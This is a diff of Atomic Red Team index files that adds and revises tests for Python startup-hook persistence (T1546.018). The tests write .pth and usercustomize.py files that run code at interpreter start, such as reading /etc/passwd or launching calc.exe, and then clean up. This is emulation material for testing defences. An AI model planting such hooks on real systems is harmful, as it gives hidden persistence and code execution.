+          if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
+          rm -rf /tmp/poc.txt
+          echo "[+] Successful remove poc.txt under /tmp"
   T1037.003:
     technique:
       type: attack-pattern
@@ -38645,43 +38702,100 @@ persistence:
       x_mitre_version: '1.0'
       identifier: T1546.018
     atomic_tests:
-    - name: Python Startup Hook Execution via .pth (Linux)
-      auto_generated_guid: 85f21c19-18ef-4450-98d8-05bb7b0e1887
-      description: 'Creates a Python startup hook using a .pth file inside a virtual
-        environment on Linux.
-
-        '
+    - name: Python Startup Hook - atomic_hook.pth (Linux)
+      auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
+      description: "Executes code by creating atomic_hook.pth in the site-packages
+        directory. \nThis script runs automatically for every user on the system when
+        Python starts.\n"
       supported_platforms:
       - linux
       input_arguments:
-        python_path:
-          description: Path to Python interpreter
-          type: path
+        python_exe:
+          description: The python binary name to test
+          type: String
           default: python3
-      dependency_executor_name: bash
+      dependency_executor_name: sh
       dependencies:
-      - description: Ensure Python is installed
-        prereq_command: command -v
-        get_prereq_command: 'echo "Python3 not found. Please install it using your
-          package manager (e.g., ''sudo apt install python3'' or ''sudo yum install
-          python3'')."
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
 
           '
       executor:
-        name: bash
+        name: sh
         elevation_required: false
         command: |
-          PYTHON_EXE=$(command -v #{python_path})
-          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XXXXXX)
-          echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
-          $PYTHON_EXE -m venv "$TEMPDIR/env"
-          SITE_PACKAGES=$("$TEMPDIR/env/bin/python" -c "import site; print(site.getsitepackages()[0])")
-          echo "import sys, os; (not hasattr(sys, 'hook_run')) and (setattr(sys, 'hook_run', True) or os.system('cat /etc/passwd'))" > "$SITE_PACKAGES/atomic_hook.pth"
-          "$TEMPDIR/env/bin/python" -c "print('Interpreter started')"
-        cleanup_command: 'rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f
-          /tmp/atomic_python_hook_path.txt
+          TEMPDIR="/tmp/atomic_sitecust_posix"
+          mkdir -p "$TEMPDIR"
+          "#{python_exe}" -m venv "$TEMPDIR/env"
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
+          echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
+          ls -la "$SITE_PACKAGES/atomic_hook.pth"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
+          if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
+        cleanup_command: |
+          if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          rm -rf /tmp/atomic_sitecust_posix
+          echo "[+] Successful Removed atomic_hook.pth"
+          rm -rf /tmp/atomic_hook_poc.txt
+          echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
+    - name: Python Startup Hook - usercustomize.py (Linux / MacOS)
+      auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require root privileges.\n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
 
           '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
+          brew install python3 or brew install python@3.x or the macOS developer tools
+          (''xcode-select --install''))."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
+          mkdir -p "$USER_PACKAGES"
+          echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
+          if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
+          $PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
+          if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
+        cleanup_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
+          if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
+          rm -rf /tmp/poc.txt
+          echo "[+] Successful remove poc.txt under /tmp"
   T1037.003:
     technique:
       type: attack-pattern

atomics/Indexes/macos-index.yaml

@@ -23116,8 +23116,8 @@ privilege-escalation:
       x_mitre_version: '1.0'
       identifier: T1546.018
     atomic_tests:
-    - name: Python Startup Hook Execution via .pth (macOS)
-      auto_generated_guid: 858b4aed-d76f-443d-a801-5454ea56dee0
+    - name: Python Startup Hook - atomic_hook.pth (macOS)
+      auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
       description: 'Creates a Python startup hook using a .pth file inside a virtual
         environment on macOS.
 
@@ -23129,32 +23129,87 @@ privilege-escalation:
           description: App to launch
           type: string
           default: Calculator
-        python_path:
-          description: Path to Python interpreter
-          type: path
+        python_exe:
+          description: The python binary name to test
+          type: string
           default: python3
-      dependency_executor_name: bash
+      dependency_executor_name: sh
       dependencies:
-      - description: Ensure Python is installed
-        prereq_command: command -v
+      - description: Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+        prereq_command: |
+          PYTHON_CMD=$(command -v python || command -v #{python_exe})
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
         get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
-          (''brew install python'') or the macOS developer tools (''xcode-select --install'')."
+          (''brew install python'' or ''brew install python3 or brew install python@3.X'')
+          or the macOS developer tools (''xcode-select --install'')."
 
           '
       executor:
-        name: bash
+        name: sh
         elevation_required: false
         command: |
-          PYTHON_EXE=$(command -v #{python_path})
-          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XXXXXX)
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
           echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
           $PYTHON_EXE -m venv "$TEMPDIR/env"
-          SITE_PACKAGES=$("$TEMPDIR/env/bin/python" -c "import site; print(site.getsitepackages()[0])")
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
           echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
-          "$TEMPDIR/env/bin/python" -c "print('Interpreter started')"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
         cleanup_command: |
+          if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
           pkill "#{exe_name}" || true
           [ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
+          echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
+    - name: Python Startup Hook - usercustomize.py (Linux / MacOS)
+      auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require root privileges.\n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
+          brew install python3 or brew install python@3.x or the macOS developer tools
+          (''xcode-select --install''))."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
+          mkdir -p "$USER_PACKAGES"
+          echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
+          if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
+          $PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
+          if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
+        cleanup_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
+          if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
+          rm -rf /tmp/poc.txt
+          echo "[+] Successful remove poc.txt under /tmp"
   T1037.003:
     technique:
       type: attack-pattern
@@ -35693,8 +35748,8 @@ persistence:
       x_mitre_version: '1.0'
       identifier: T1546.018
     atomic_tests:
-    - name: Python Startup Hook Execution via .pth (macOS)
-      auto_generated_guid: 858b4aed-d76f-443d-a801-5454ea56dee0
+    - name: Python Startup Hook - atomic_hook.pth (macOS)
+      auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
       description: 'Creates a Python startup hook using a .pth file inside a virtual
         environment on macOS.
 
@@ -35706,32 +35761,87 @@ persistence:
           description: App to launch
           type: string
           default: Calculator
-        python_path:
-          description: Path to Python interpreter
-          type: path
+        python_exe:
+          description: The python binary name to test
+          type: string
           default: python3
-      dependency_executor_name: bash
+      dependency_executor_name: sh
       dependencies:
-      - description: Ensure Python is installed
-        prereq_command: command -v
+      - description: Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+        prereq_command: |
+          PYTHON_CMD=$(command -v python || command -v #{python_exe})
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
         get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
-          (''brew install python'') or the macOS developer tools (''xcode-select --install'')."
+          (''brew install python'' or ''brew install python3 or brew install python@3.X'')
+          or the macOS developer tools (''xcode-select --install'')."
 
           '
       executor:
-        name: bash
+        name: sh
         elevation_required: false
         command: |
-          PYTHON_EXE=$(command -v #{python_path})
-          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XXXXXX)
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
           echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
           $PYTHON_EXE -m venv "$TEMPDIR/env"
-          SITE_PACKAGES=$("$TEMPDIR/env/bin/python" -c "import site; print(site.getsitepackages()[0])")
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
           echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
-          "$TEMPDIR/env/bin/python" -c "print('Interpreter started')"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
         cleanup_command: |
+          if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
           pkill "#{exe_name}" || true
           [ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
+          echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
+    - name: Python Startup Hook - usercustomize.py (Linux / MacOS)
+      auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require root privileges.\n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
+          brew install python3 or brew install python@3.x or the macOS developer tools
+          (''xcode-select --install''))."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
+          mkdir -p "$USER_PACKAGES"
+          echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
+          if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
+          $PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
+          if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
+        cleanup_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
+          if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
+          rm -rf /tmp/poc.txt
+          echo "[+] Successful remove poc.txt under /tmp"
   T1037.003:
     technique:
       type: attack-pattern

atomics/Indexes/windows-index.yaml

@@ -38050,52 +38050,97 @@ privilege-escalation:
       x_mitre_version: '1.0'
       identifier: T1546.018
     atomic_tests:
-    - name: Python Startup Hook Execution via .pth (Windows)
-      auto_generated_guid: b4773c6b-3aa0-44a2-830a-b6ff594a0fb2
-      description: 'Creates a Python startup hook using a .pth file inside a virtual
-        environment on Windows.
-
-        '
+    - name: Python Startup Hook - atomic_hook.pth (Windows)
+      auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
+      description: "Executes code by placing a .pth file in the site-packages directory.
+        \nSupports python.exe and python3.exe via input arguments.\n"
       supported_platforms:
       - windows
       input_arguments:
-        exe_name:
-          description: Executable to launch
-          type: string
-          default: calc.exe
-        python_path:
-          description: Path to Python interpreter
-          type: path
+        python_exe:
+          description: The python binary name to test.
+          type: String
           default: python.exe
       dependency_executor_name: powershell
       dependencies:
-      - description: Ensure Python is installed
-        prereq_command: 'if (Get-Command #{python_path} -ErrorAction SilentlyContinue)
-          { exit 0 } else { exit 1 }
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
 
           '
-        get_prereq_command: 'Write-Host "Python not found. Please install it from
-          https://www.python.org/downloads/windows/ or via ''winget install Python.Python.3''"
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
 
           '
       executor:
         name: powershell
         elevation_required: false
         command: |
-          $TempDir = Join-Path $env:TEMP ("atomic_python_hook_" + [guid]::NewGuid())
-          New-Item -ItemType Directory -Path $TempDir | Out-Null
-          Set-Location $TempDir
-          Set-Content -Path "$env:TEMP\atomic_python_hook_path.txt" -Value $TempDir
-          & "#{python_path}" -m venv env
+          $TempDir = Join-Path $env:TEMP "atomic_pth_win"
+          New-Item -ItemType Directory -Path $TempDir -Force
+          & "#{python_exe}" -m venv "$TempDir\env"
           $SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
-          "import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['#{exe_name}']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
-          & "$TempDir\env\Scripts\python.exe" -c "print('Interpreter started')"
+          "import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
+          Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
+          & "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
         cleanup_command: |
-          Get-Process CalculatorApp -ErrorAction SilentlyContinue | Stop-Process -Force
-          if (Test-Path "$env:TEMP\atomic_python_hook_path.txt") {
-            $TempDir = Get-Content "$env:TEMP\atomic_python_hook_path.txt"
-            Remove-Item -Recurse -Force $TempDir -ErrorAction SilentlyContinue
-            Remove-Item "$env:TEMP\atomic_python_hook_path.txt" -Force }
+          if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
+          Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
+          Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
+          Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Write-Host "[+] Successfully Terminated Calculator"
+    - name: Python Startup Hook - usercustomize.py (Windows)
+      auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require Administrative privileges.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
+          if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
+          "import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
+          Get-ChildItem -Path "$UserDir"
+          & "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
+        cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
+          SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
+          -ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
+          }; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
+          (-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
+          | Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
+          missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
+          T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
+          |\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
+          \nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
+          -Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
+          -Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
   T1037.003:
     technique:
       type: attack-pattern
@@ -59009,52 +59054,97 @@ persistence:
       x_mitre_version: '1.0'
       identifier: T1546.018
     atomic_tests:
-    - name: Python Startup Hook Execution via .pth (Windows)
-      auto_generated_guid: b4773c6b-3aa0-44a2-830a-b6ff594a0fb2
-      description: 'Creates a Python startup hook using a .pth file inside a virtual
-        environment on Windows.
-
-        '
+    - name: Python Startup Hook - atomic_hook.pth (Windows)
+      auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
+      description: "Executes code by placing a .pth file in the site-packages directory.
+        \nSupports python.exe and python3.exe via input arguments.\n"
       supported_platforms:
       - windows
       input_arguments:
-        exe_name:
-          description: Executable to launch
-          type: string
-          default: calc.exe
-        python_path:
-          description: Path to Python interpreter
-          type: path
+        python_exe:
+          description: The python binary name to test.
+          type: String
           default: python.exe
       dependency_executor_name: powershell
       dependencies:
-      - description: Ensure Python is installed
-        prereq_command: 'if (Get-Command #{python_path} -ErrorAction SilentlyContinue)
-          { exit 0 } else { exit 1 }
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
 
           '
-        get_prereq_command: 'Write-Host "Python not found. Please install it from
-          https://www.python.org/downloads/windows/ or via ''winget install Python.Python.3''"
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
 
           '
       executor:
         name: powershell
         elevation_required: false
         command: |
-          $TempDir = Join-Path $env:TEMP ("atomic_python_hook_" + [guid]::NewGuid())
-          New-Item -ItemType Directory -Path $TempDir | Out-Null
-          Set-Location $TempDir
-          Set-Content -Path "$env:TEMP\atomic_python_hook_path.txt" -Value $TempDir
-          & "#{python_path}" -m venv env
+          $TempDir = Join-Path $env:TEMP "atomic_pth_win"
+          New-Item -ItemType Directory -Path $TempDir -Force
+          & "#{python_exe}" -m venv "$TempDir\env"
           $SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
-          "import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['#{exe_name}']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
-          & "$TempDir\env\Scripts\python.exe" -c "print('Interpreter started')"
+          "import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
+          Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
+          & "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
         cleanup_command: |
-          Get-Process CalculatorApp -ErrorAction SilentlyContinue | Stop-Process -Force
-          if (Test-Path "$env:TEMP\atomic_python_hook_path.txt") {
-            $TempDir = Get-Content "$env:TEMP\atomic_python_hook_path.txt"
-            Remove-Item -Recurse -Force $TempDir -ErrorAction SilentlyContinue
-            Remove-Item "$env:TEMP\atomic_python_hook_path.txt" -Force }
+          if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
+          Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
+          Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
+          Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Write-Host "[+] Successfully Terminated Calculator"
+    - name: Python Startup Hook - usercustomize.py (Windows)
+      auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require Administrative privileges.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
+          if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
+          "import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
+          Get-ChildItem -Path "$UserDir"
+          & "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
+        cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
+          SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
+          -ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
+          }; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
+          (-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
+          | Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
+          missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
+          T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
+          |\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
